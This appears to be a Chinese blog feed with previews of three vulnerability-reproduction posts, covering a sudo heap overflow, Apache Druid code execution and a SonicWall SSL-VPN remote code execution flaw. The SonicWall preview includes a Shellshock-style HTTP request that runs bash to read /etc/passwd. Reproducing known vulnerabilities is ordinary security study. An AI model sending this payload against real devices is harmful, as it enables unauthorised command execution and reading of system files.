今天没有新动态
@一只冷涵

CVE-2021-3156漏洞复现

漏洞原因 1.9.5p2之前的Sudo具有基于堆的缓冲区溢出,从而允许特权通过“ sudoedit -s”和以单个反斜杠字符结尾的命令行参数扩展为root 漏洞影响 Sudo 1.8.2 – 1.8.31p2 Sudo 1.9.0 – 1.9.5p1 漏洞复现
  • 1
  • 0
  • 0
  • 1
@一只冷涵

CVE-2021-25646漏洞复现

漏洞原因 Apache Druid能够执行嵌入在各种类型的请求中的用户提供的JavaScript代码。此功能旨在用于高信任度环境,默认情况下处于禁用状态。但是,在Druid 0.20.0和更早版本中,经过身份验证的用户可以发送特制请求,以强制Druid为该请求运行用户 ...
  • 0
  • 0
  • 0
  • 3
@一只冷涵

SonicWall SSL-VPN 未授权RCE漏洞复现

漏洞原因 未知 漏洞影响 未知 漏洞复现 Exp GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host:127.0.0.1 User-Agent: () { :; }; echo ; /bin/bash -c "cat /etc/passwd" Accept: text/html,application/xhtml+xml,application/xml;q=0.9 ...
  • 0
  • 0
  • 0
  • 2